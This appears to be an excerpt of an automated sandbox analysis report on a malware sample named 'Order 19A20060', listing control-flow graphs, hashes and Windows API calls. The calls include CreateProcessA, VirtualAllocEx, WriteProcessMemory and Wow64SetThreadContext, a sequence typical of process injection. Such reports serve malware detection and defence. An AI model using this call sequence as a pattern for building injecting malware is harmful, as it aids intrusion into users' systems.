                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 294 7a300df-7a30186 301 7a301b0 294->301 302 7a30188-7a30194 294->302 305 7a301b6-7a30263 301->305 303 7a30196-7a3019c 302->303 304 7a3019e-7a301a4 302->304 306 7a301ae 303->306 304->306 314 7a30265-7a30271 305->314 315 7a3028d 305->315 306->305 316 7a30273-7a30279 314->316 317 7a3027b-7a30281 314->317 318 7a30293-7a304ec 315->318 319 7a3028b 316->319 317->319 330 7a304ef call 7a82428 318->330 331 7a304ef call 7a82419 318->331 319->318 322 7a304f5-7a3068e 332 7a30693 call 7a83bdb 322->332 333 7a30693 call 7a83be0 322->333 325 7a30699-7a306bf 328 7a306c5 call 7a8451b 325->328 329 7a306c5 call 7a84520 325->329 327 7a306cb-7a306da 328->327 329->327 330->322 331->322 332->325 333->325
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: 45f93e52e6d7b13f1679e68aa9fe5fadf29eae90cc5cc83f95d75b958ae09e95
                                                                              • Instruction ID: 225c33e628d95eaec4556b14868ce577fbf48f65b09c3e26254c8be659e23436
                                                                              • Opcode Fuzzy Hash: 45f93e52e6d7b13f1679e68aa9fe5fadf29eae90cc5cc83f95d75b958ae09e95
                                                                              • Instruction Fuzzy Hash: 7651B3B4A04218CFEB64DF64C994B9EB7B2FB89300F1085A9E549A7344DB349E85CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 505 7a8e07c-7a8e11d 507 7a8e11f-7a8e129 505->507 508 7a8e156-7a8e176 505->508 507->508 509 7a8e12b-7a8e12d 507->509 513 7a8e178-7a8e182 508->513 514 7a8e1af-7a8e1de 508->514 511 7a8e12f-7a8e139 509->511 512 7a8e150-7a8e153 509->512 515 7a8e13b 511->515 516 7a8e13d-7a8e14c 511->516 512->508 513->514 518 7a8e184-7a8e186 513->518 524 7a8e1e0-7a8e1ea 514->524 525 7a8e217-7a8e2d1 CreateProcessA 514->525 515->516 516->516 517 7a8e14e 516->517 517->512 519 7a8e188-7a8e192 518->519 520 7a8e1a9-7a8e1ac 518->520 522 7a8e194 519->522 523 7a8e196-7a8e1a5 519->523 520->514 522->523 523->523 527 7a8e1a7 523->527 524->525 526 7a8e1ec-7a8e1ee 524->526 536 7a8e2da-7a8e360 525->536 537 7a8e2d3-7a8e2d9 525->537 528 7a8e1f0-7a8e1fa 526->528 529 7a8e211-7a8e214 526->529 527->520 531 7a8e1fc 528->531 532 7a8e1fe-7a8e20d 528->532 529->525 531->532 532->532 533 7a8e20f 532->533 533->529 547 7a8e370-7a8e374 536->547 548 7a8e362-7a8e366 536->548 537->536 549 7a8e384-7a8e388 547->549 550 7a8e376-7a8e37a 547->550 548->547 551 7a8e368 548->551 553 7a8e398-7a8e39c 549->553 554 7a8e38a-7a8e38e 549->554 550->549 552 7a8e37c 550->552 551->547 552->549 556 7a8e3ae-7a8e3b5 553->556 557 7a8e39e-7a8e3a4 553->557 554->553 555 7a8e390 554->555 555->553 558 7a8e3cc 556->558 559 7a8e3b7-7a8e3c6 556->559 557->556 560 7a8e3cd 558->560 559->558 560->560
                                                                              APIs
                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A8E2BE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: db5b7152a6aa6a8fb3f18e661e837161b6f8a43adaf1a542512c23bcd7847835
                                                                              • Instruction ID: 3283a5f2c4bf80d0620b8152402b9ac3f8c1a67c454ee8f3ad32cf47b6bc0319
                                                                              • Opcode Fuzzy Hash: db5b7152a6aa6a8fb3f18e661e837161b6f8a43adaf1a542512c23bcd7847835
                                                                              • Instruction Fuzzy Hash: 9BA17BB1D0421ADFDF64DFA8C8407EDBBB2BF88314F0485A9D818A7240D7749985CF92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 562 7a8e088-7a8e11d 564 7a8e11f-7a8e129 562->564 565 7a8e156-7a8e176 562->565 564->565 566 7a8e12b-7a8e12d 564->566 570 7a8e178-7a8e182 565->570 571 7a8e1af-7a8e1de 565->571 568 7a8e12f-7a8e139 566->568 569 7a8e150-7a8e153 566->569 572 7a8e13b 568->572 573 7a8e13d-7a8e14c 568->573 569->565 570->571 575 7a8e184-7a8e186 570->575 581 7a8e1e0-7a8e1ea 571->581 582 7a8e217-7a8e2d1 CreateProcessA 571->582 572->573 573->573 574 7a8e14e 573->574 574->569 576 7a8e188-7a8e192 575->576 577 7a8e1a9-7a8e1ac 575->577 579 7a8e194 576->579 580 7a8e196-7a8e1a5 576->580 577->571 579->580 580->580 584 7a8e1a7 580->584 581->582 583 7a8e1ec-7a8e1ee 581->583 593 7a8e2da-7a8e360 582->593 594 7a8e2d3-7a8e2d9 582->594 585 7a8e1f0-7a8e1fa 583->585 586 7a8e211-7a8e214 583->586 584->577 588 7a8e1fc 585->588 589 7a8e1fe-7a8e20d 585->589 586->582 588->589 589->589 590 7a8e20f 589->590 590->586 604 7a8e370-7a8e374 593->604 605 7a8e362-7a8e366 593->605 594->593 606 7a8e384-7a8e388 604->606 607 7a8e376-7a8e37a 604->607 605->604 608 7a8e368 605->608 610 7a8e398-7a8e39c 606->610 611 7a8e38a-7a8e38e 606->611 607->606 609 7a8e37c 607->609 608->604 609->606 613 7a8e3ae-7a8e3b5 610->613 614 7a8e39e-7a8e3a4 610->614 611->610 612 7a8e390 611->612 612->610 615 7a8e3cc 613->615 616 7a8e3b7-7a8e3c6 613->616 614->613 617 7a8e3cd 615->617 616->615 617->617
                                                                              APIs
                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A8E2BE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: 0739d484394588e0f046dcef6a8d0f5a027b380f2fec2fa470cf320f89241e9a
                                                                              • Instruction ID: 7982c3ab1813e490b6a3c4837fa82766cc66b99a2b66765b2d2682ffe25b23bb
                                                                              • Opcode Fuzzy Hash: 0739d484394588e0f046dcef6a8d0f5a027b380f2fec2fa470cf320f89241e9a
                                                                              • Instruction Fuzzy Hash: 80915CB1D0421ADFDF64DFA8C840BDDBBB2BF88314F1485A9D818A7250DB749985CF92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 619 300ae70-300ae7f 620 300ae81-300ae8e call 3009878 619->620 621 300aeab-300aeaf 619->621 627 300ae90 620->627 628 300aea4 620->628 623 300aeb1-300aebb 621->623 624 300aec3-300af04 621->624 623->624 630 300af11-300af1f 624->630 631 300af06-300af0e 624->631 675 300ae96 call 300b108 627->675 676 300ae96 call 300b0f8 627->676 628->621 632 300af21-300af26 630->632 633 300af43-300af45 630->633 631->630 635 300af31 632->635 636 300af28-300af2f call 300a854 632->636 638 300af48-300af4f 633->638 634 300ae9c-300ae9e 634->628 637 300afe0-300b0a0 634->637 640 300af33-300af41 635->640 636->640 670 300b0a2-300b0a5 637->670 671 300b0a8-300b0d3 GetModuleHandleW 637->671 641 300af51-300af59 638->641 642 300af5c-300af63 638->642 640->638 641->642 645 300af70-300af79 call 300a864 642->645 646 300af65-300af6d 642->646 650 300af86-300af8b 645->650 651 300af7b-300af83 645->651 646->645 652 300afa9-300afad 650->652 653 300af8d-300af94 650->653 651->650 658 300afb3-300afb6 652->658 653->652 655 300af96-300afa6 call 300a874 call 300a884 653->655 655->652 660 300afb8-300afd6 658->660 661 300afd9-300afdf 658->661 660->661 670->671 672 300b0d5-300b0db 671->672 673 300b0dc-300b0f0 671->673 672->673 675->634 676->634
                                                                              APIs
                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0300B0C6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1678082340.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3000000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID:
                                                                              • API String ID: 4139908857-0
                                                                              • Opcode ID: 292eabecd42ae7d0ad7de5f5adcb1c20aaa4862b4948adeb5edbcc36ddcd91e6
                                                                              • Instruction ID: 1c299a189c4b9d46a2b2289ee8fce8c4bd8a6139e36c2926c50e3eeef854b207
                                                                              • Opcode Fuzzy Hash: 292eabecd42ae7d0ad7de5f5adcb1c20aaa4862b4948adeb5edbcc36ddcd91e6
                                                                              • Instruction Fuzzy Hash: 327168B0A01B058FE764DF69C4407AABBF1FF88300F048A2DD486D7A90DB75E949CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 677 5720aa8-5721d56 679 5721d61-5721d68 677->679 680 5721d58-5721d5e 677->680 681 5721d73-5721e12 CreateWindowExW 679->681 682 5721d6a-5721d70 679->682 680->679 684 5721e14-5721e1a 681->684 685 5721e1b-5721e53 681->685 682->681 684->685 689 5721e60 685->689 690 5721e55-5721e58 685->690 691 5721e61 689->691 690->689 691->691
                                                                              APIs
                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05721E02
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1681183403.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_5720000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: CreateWindow
                                                                              • String ID:
                                                                              • API String ID: 716092398-0
                                                                              • Opcode ID: 8b9b6b6309fa74174261d6e25236c80400a9bece2e82717f7df233971a7b99e4
                                                                              • Instruction ID: a90b3de0452a328ac41abda252053a33b2ead4aa365de09384eb8873b0296ada
                                                                              • Opcode Fuzzy Hash: 8b9b6b6309fa74174261d6e25236c80400a9bece2e82717f7df233971a7b99e4
                                                                              • Instruction Fuzzy Hash: DC51CFB1D00359DFDB14CFA9C984ADEBBB6FF48310F64812AE819AB210D7719885CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 692 5721ce5-5721d56 693 5721d61-5721d68 692->693 694 5721d58-5721d5e 692->694 695 5721d73-5721dab 693->695 696 5721d6a-5721d70 693->696 694->693 697 5721db3-5721e12 CreateWindowExW 695->697 696->695 698 5721e14-5721e1a 697->698 699 5721e1b-5721e53 697->699 698->699 703 5721e60 699->703 704 5721e55-5721e58 699->704 705 5721e61 703->705 704->703 705->705
                                                                              APIs
                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05721E02
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1681183403.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_5720000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: CreateWindow
                                                                              • String ID:
                                                                              • API String ID: 716092398-0
                                                                              • Opcode ID: e9aa4d203544b6e28bc0a9eec5ebc4037697ff579cf1a477d009e6fe085132f9
                                                                              • Instruction ID: 5b8150dde858e7832e69234dce75be2a3a07ded2c13c2d465ae10614fbf2f800
                                                                              • Opcode Fuzzy Hash: e9aa4d203544b6e28bc0a9eec5ebc4037697ff579cf1a477d009e6fe085132f9
                                                                              • Instruction Fuzzy Hash: 9D51CEB1D10359DFDB14CFA9C984ADEBBB6BF48310F64852AE819AB210D7719885CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 706 5720bfc-57242fc 709 5724302-5724307 706->709 710 57243ac-57243cc call 5720ad4 706->710 711 572435a-5724392 CallWindowProcW 709->711 712 5724309-5724340 709->712 718 57243cf-57243dc 710->718 714 5724394-572439a 711->714 715 572439b-57243aa 711->715 720 5724342-5724348 712->720 721 5724349-5724358 712->721 714->715 715->718 720->721 721->718
                                                                              APIs
                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 05724381
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1681183403.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_5720000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: CallProcWindow
                                                                              • String ID:
                                                                              • API String ID: 2714655100-0
                                                                              • Opcode ID: 8f984520f780216f911d99dda944193134571dcad68c9100b3e282dc2585462e
                                                                              • Instruction ID: 7c2393df310a8ff9735179a0c9229f54bd46fb086a215a062d7cac3d8ccf5227
                                                                              • Opcode Fuzzy Hash: 8f984520f780216f911d99dda944193134571dcad68c9100b3e282dc2585462e
                                                                              • Instruction Fuzzy Hash: 4F41E7B59003159FCB14CF99C448AAEFBF6FB88314F24C459E519AB321D774A845DFA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 723 3004248-30059d9 CreateActCtxA 726 30059e2-3005a3c 723->726 727 30059db-30059e1 723->727 734 3005a4b-3005a4f 726->734 735 3005a3e-3005a41 726->735 727->726 736 3005a60 734->736 737 3005a51-3005a5d 734->737 735->734 739 3005a61 736->739 737->736 739->739
                                                                              APIs
                                                                              • CreateActCtxA.KERNEL32(?), ref: 030059C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1678082340.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3000000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0
                                                                              • Opcode ID: 6c39476e0edb5a37c0a5d3f339364cba26eb4d8f180c5d4b941e14fdc451c68b
                                                                              • Instruction ID: 58eb13f34c98021c88a739deb3c4fad94ee9ae92b8e2864c0925690ef0049f48
                                                                              • Opcode Fuzzy Hash: 6c39476e0edb5a37c0a5d3f339364cba26eb4d8f180c5d4b941e14fdc451c68b
                                                                              • Instruction Fuzzy Hash: F541BFB0C0561DCFDB24DFA9C884B9EBBF5BF49304F24806AD408AB255DB756949CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 740 300590d-3005914 741 300591c-30059d9 CreateActCtxA 740->741 743 30059e2-3005a3c 741->743 744 30059db-30059e1 741->744 751 3005a4b-3005a4f 743->751 752 3005a3e-3005a41 743->752 744->743 753 3005a60 751->753 754 3005a51-3005a5d 751->754 752->751 756 3005a61 753->756 754->753 756->756
                                                                              APIs
                                                                              • CreateActCtxA.KERNEL32(?), ref: 030059C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1678082340.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3000000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0
                                                                              • Opcode ID: 32cc7497542ad4898616c22fc58f4d9382606dd7f84c550ab1c768faaed8567c
                                                                              • Instruction ID: c90c277fe2738579d724fc33c5a4dfe5a7c182bf46aeb6857d47e4ce73eebc8d
                                                                              • Opcode Fuzzy Hash: 32cc7497542ad4898616c22fc58f4d9382606dd7f84c550ab1c768faaed8567c
                                                                              • Instruction Fuzzy Hash: 8641E0B0C00619CEDB24DFA9C8847CEBBF5BF49304F24805AD418AB255DB755949CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 757 300a898-300a8a0 759 300a8a2-300a8b7 757->759 760 300a8cc-300a900 757->760 761 300b2e8-300b328 759->761 760->761 763 300b330-300b35f LoadLibraryExW 761->763 764 300b32a-300b32d 761->764 765 300b361-300b367 763->765 766 300b368-300b385 763->766 764->763 765->766
                                                                              APIs
                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0300B141,00000800,00000000,00000000), ref: 0300B352
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1678082340.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3000000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 5d6ac9a8ad8a10a9e6391d5678a7a6f5906c27d2bfeefefe5928bbb09bc7ce14
                                                                              • Instruction ID: 182a48ef2de1783c30216fc3e2a15496319bf821348a70a32c15fea8589e66b0
                                                                              • Opcode Fuzzy Hash: 5d6ac9a8ad8a10a9e6391d5678a7a6f5906c27d2bfeefefe5928bbb09bc7ce14
                                                                              • Instruction Fuzzy Hash: BE31BDB68053988FEB10DFAAC4546DEBFF0EF49310F14806AD495AB251C3749545CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A8DA90
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: 8190d61e1b6a52d46e5d99bf77332b5d8da9627d2ec2cf1bc300ba1a2b423497
                                                                              • Instruction ID: 292576a0cbb06874a9c7427819094caaaee768d8d50a98443877afba0ae911fc
                                                                              • Opcode Fuzzy Hash: 8190d61e1b6a52d46e5d99bf77332b5d8da9627d2ec2cf1bc300ba1a2b423497
                                                                              • Instruction Fuzzy Hash: 7B2137B6900319DFCB10DFA9C981BEEFBF1BF48310F10882AE569A7251D7749954CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A8DB70
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessRead
                                                                              • String ID:
                                                                              • API String ID: 1726664587-0
                                                                              • Opcode ID: 581638d08d32f954b2c3f535841fa7e3820893367c5caf11dfc5d39a876967ef
                                                                              • Instruction ID: 00619edc5fb74e5195e490cd4f212e01ebe203566a94d28dbc85cf1742c99901
                                                                              • Opcode Fuzzy Hash: 581638d08d32f954b2c3f535841fa7e3820893367c5caf11dfc5d39a876967ef
                                                                              • Instruction Fuzzy Hash: 312148B1900359DFCB10DFAAC884AEEFBF5FF48320F10842AE558A7250C7399944CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A8DA90
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: 3e18038fed339dcc1ae163d6d19228b6998ef0e25806a0102a240321a58ddee4
                                                                              • Instruction ID: 9b91e5a318b1f48d8fe070c73c8e48bd72774823301b80681ba58e320b4e6bb4
                                                                              • Opcode Fuzzy Hash: 3e18038fed339dcc1ae163d6d19228b6998ef0e25806a0102a240321a58ddee4
                                                                              • Instruction Fuzzy Hash: 562126B19003599FCB10DFA9C885BDEFBF5FF48310F108829E969A7250D7789944CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A8D8E6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: faa7b237fcad245c208ce9d286e72a9a08fd811db3059030cdd031bbf65e670b
                                                                              • Instruction ID: 6832cc406c84adf4a078527f5c7c9d04bc3819bab34cfd9af15e3da8fa6d8891
                                                                              • Opcode Fuzzy Hash: faa7b237fcad245c208ce9d286e72a9a08fd811db3059030cdd031bbf65e670b
                                                                              • Instruction Fuzzy Hash: 1F2137B1D003098FDB10DFAAC5857EEBBF0EF88324F14842AD559A7241D7789989CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0300D306,?,?,?,?,?), ref: 0300D3C7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1678082340.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3000000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0
                                                                              • Opcode ID: 7fa2415d2be241815330a5d5fbaaa88e5c0939c3fa9d95b97c66ab55da361c55
                                                                              • Instruction ID: 12e3ec7a9a969d43d0ba1690ccdd19a759343c601d5ba556c80127c7f0be2444
                                                                              • Opcode Fuzzy Hash: 7fa2415d2be241815330a5d5fbaaa88e5c0939c3fa9d95b97c66ab55da361c55
                                                                              • Instruction Fuzzy Hash: 7A21E3B5901248DFDB10CFAAD584ADEFBF5EB48310F14841AE914A7350D374A954CFA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A8DB70
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessRead
                                                                              • String ID:
                                                                              • API String ID: 1726664587-0
                                                                              • Opcode ID: 567aac8a6d48620ced86e78fad76cc35fc18767d44efff625c93685cbe3ee8d5
                                                                              • Instruction ID: 31e93833f2ebd5855512ef649860b4e4439ea34c7831dbbd509c736a0f9acb30
                                                                              • Opcode Fuzzy Hash: 567aac8a6d48620ced86e78fad76cc35fc18767d44efff625c93685cbe3ee8d5
                                                                              • Instruction Fuzzy Hash: DF2137B1D003599FCB10DFAAC884AEEFBF5FF48320F10842AE559A7250D7389944CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A8D8E6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: 0eea578f44fc61db275bd9104255f514ae39b1618f901caecb9a511c12c8fc85
                                                                              • Instruction ID: 510789d0f4301777a1edda85d3ab09304f10858cb3c29daec9458ff539d65ec8
                                                                              • Opcode Fuzzy Hash: 0eea578f44fc61db275bd9104255f514ae39b1618f901caecb9a511c12c8fc85
                                                                              • Instruction Fuzzy Hash: 722138B1D003098FDB10DFAAC4857EEBBF4EF88324F108429D459A7240DB789944CFA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0300D306,?,?,?,?,?), ref: 0300D3C7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1678082340.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3000000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0
                                                                              • Opcode ID: 76b33d47a02b3e40bd5d77abb61ce941dfccacca0622aa469c58789e066c982e
                                                                              • Instruction ID: 67b2f3a37424e5ce86807a223ca6a94ba396974b8d282d279e906ab9d300b90e
                                                                              • Opcode Fuzzy Hash: 76b33d47a02b3e40bd5d77abb61ce941dfccacca0622aa469c58789e066c982e
                                                                              • Instruction Fuzzy Hash: 2321E0B5901219DFDB10CFA9D985ADEBBF5EB48320F14841AE918A7350D374A944CFA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A8D9AE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 1c3509bf4be3ba80a54d26d70b4be21bf75df7d86cb48d00451d4c723e11e085
                                                                              • Instruction ID: 126364fcd61d4f2075894120dd67bc4e23fc40c21fdf8cf75cbdcd9e6c67fa3c
                                                                              • Opcode Fuzzy Hash: 1c3509bf4be3ba80a54d26d70b4be21bf75df7d86cb48d00451d4c723e11e085
                                                                              • Instruction Fuzzy Hash: 721147B29002499FCB10DFA9D845ADEFFF5EF88324F108819E559A7650C735A944CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0300B141,00000800,00000000,00000000), ref: 0300B352
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1678082340.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3000000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 7b81a1f7ffe4a71e39979a042b9257fffdbbd0dd3c14bc99c9a08a71b49097e1
                                                                              • Instruction ID: 87d4652c57ee3aa3e93fc66fbdba0b6df1b0cf6f76ecd991673c1f1477a94780
                                                                              • Opcode Fuzzy Hash: 7b81a1f7ffe4a71e39979a042b9257fffdbbd0dd3c14bc99c9a08a71b49097e1
                                                                              • Instruction Fuzzy Hash: B91123B69003489FDB20CFAAC444ADEFBF4EB48310F14842EE519A7250C3B5A945CFA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
